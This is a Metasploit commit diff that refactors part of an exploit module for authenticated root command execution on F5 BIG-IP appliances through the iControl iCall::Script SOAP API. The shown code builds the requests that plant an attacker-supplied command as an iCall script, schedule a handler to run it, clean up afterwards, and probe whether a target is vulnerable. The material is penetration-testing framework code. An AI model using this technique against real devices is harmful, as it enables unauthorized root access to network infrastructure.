Clean up description; Simplify SOAP code more

jhart-r7 · jhart-r7 · commit 902951c0caac · 2015-11-16T11:06:45.000-08:00
diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
+  SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
+  STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+  LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name'           => "F5 iControl iCall::Script Root Command Execution",
         'Description'    => %q{
-          This module exploits an authenticated a privilege escalation vulnerability
-          in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
-          credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
-          (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+          This module exploits an authenticated privilege escalation
+          vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
+          other F5 devices). This requires valid credentials and the Resource
+          Administrator role. The exploit should work on BIG-IP 11.3.0
+          - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
+          for more details)
         },
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -112,13 +118,12 @@ def send_soap_request(pay)
   def create_script(cmd)
     scriptname = Rex::Text.rand_text_alpha_lower(5)
     create_xml = build_xml do |xml|
-      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(string_attrs) do
+      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item scriptname
         end
-        xml.definitions(string_attrs) do
+        xml.definitions(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item cmd
         end
@@ -129,9 +134,8 @@ def create_script(cmd)
 
   def delete_script(scriptname)
     delete_xml = build_xml do |xml|
-      xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(string_attrs) do
+      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item scriptname
         end
@@ -142,7 +146,7 @@ def delete_script(scriptname)
 
   def script_exists(scriptname)
     exists_xml = build_xml do |xml|
-      xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
     end
     res = send_soap_request(exists_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
@@ -151,18 +155,16 @@ def script_exists(scriptname)
   def create_handler(scriptname, interval)
     handler_name = Rex::Text.rand_text_alpha_lower(5)
     handler_xml = build_xml do |xml|
-      xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.handlers(string_attrs) do
+      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item handler_name
         end
-        xml.scripts(string_attrs) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item scriptname
         end
-        long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.intervals(long_attrs) do
+        xml.intervals(LONG_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item interval
         end
@@ -173,9 +175,8 @@ def create_handler(scriptname, interval)
 
   def delete_handler(handler_name)
     delete_xml = build_xml do |xml|
-      xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.handlers(attrs) do
+      xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item handler_name
         end
@@ -187,7 +188,7 @@ def delete_handler(handler_name)
 
   def handler_exists(handler_name)
     handler_xml = build_xml do |xml|
-      xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+      xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
     end
     res = send_soap_request(handler_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
@@ -200,13 +201,12 @@ def check
     # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
     # any other response is considered not vulnerable
     check_xml = build_xml do |xml|
-      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(attrs) do
+      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item
         end
-        xml.definitions(attrs) do
+        xml.definitions(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item
         end
